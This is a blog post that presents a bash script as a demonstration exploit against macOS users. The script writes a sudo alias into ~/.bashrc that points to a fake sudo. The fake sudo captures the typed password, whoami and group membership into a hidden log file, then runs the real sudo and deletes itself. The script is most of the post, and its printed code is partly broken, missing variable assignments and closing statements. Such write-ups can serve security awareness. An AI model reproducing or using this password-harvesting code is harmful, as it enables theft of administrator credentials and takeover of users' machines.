About | Buy | Industry Watch | Learning Curve | Products | Search | Test Drive
Home » Learning Curve

Way Too Much Sudo Fun

Bashing bash again because it's so much fun and above all so easy.

As demonstrated in 'Sudo Fun' it's possible to hijack use of the Unix sudo to obtain less than optimal results. OS X boxes can namely be compromised in a number of ways.

As demonstrated in 'Too Much Sudo Fun' it's possible to humiliate bash without risking the maintainers do anything about it. ~/.bash_profile is used to accomplish this.

But it turns out even ~/.bashrc can be made into a turkey. And that's demonstrated here and now.

#! /bin/bash



if [ -f $target ]; then
    if [ ! -w $target ]; then
        chmod a+w $target 2>/dev/null || exit 1
    touch $target 2>/dev/null || exit 1

grep -sq sudo $target || cat <<EOF >>$target
if [ -x $fakesudo ]; then
    alias sudo="$fakesudo"

if [ -f "$fakesudo" ]; then
    rm -f "$fakesudo" 2>/dev/null

touch "$fakesudo"
chmod a+x "$fakesudo"

echo '#! /bin/bash'>>"$fakesudo"
echo '#'>>"$fakesudo"
echo 'inp=""'>>"$fakesudo"

echo 'stty -echo'>>"$fakesudo"
echo 'read -p "Password:" inp'>>"$fakesudo"
echo 'stty  echo'>>"$fakesudo"
echo 'echo'>>"$fakesudo"

echo 'logfile="/Users/Shared/.keylog" '>>"$fakesudo"
echo 'echo "$inp">>"$logfile"'>>"$fakesudo"
echo 'echo `whoami`>>"$logfile" '>>"$fakesudo"
echo 'echo `groups`>>"$logfile" '>>"$fakesudo"
echo 'echo "Sorry, try again."'>>"$fakesudo"

echo '/usr/bin/sudo "$@"'>>"$fakesudo"

echo 'rm -f "/Users/Shared/sudo"'>>"$fakesudo"
echo 'bash ' >> $fakesudo
echo 'exit 0'>>"$fakesudo"

exit 0

There are a few caveats with this exploit but it does prove a point. Namely that it's all too easy - not with OS X but with bash - to own a machine.

See Also
Sudo Fun
ACP Services
Resolve Path
Too Much Sudo Fun

Thanks again to GC at the CLIX Exchange for pulling another all nighter.

About | ACP | Buy | Industry Watch | Learning Curve | Search | Test Drive
Copyright © Rixstep. All rights reserved.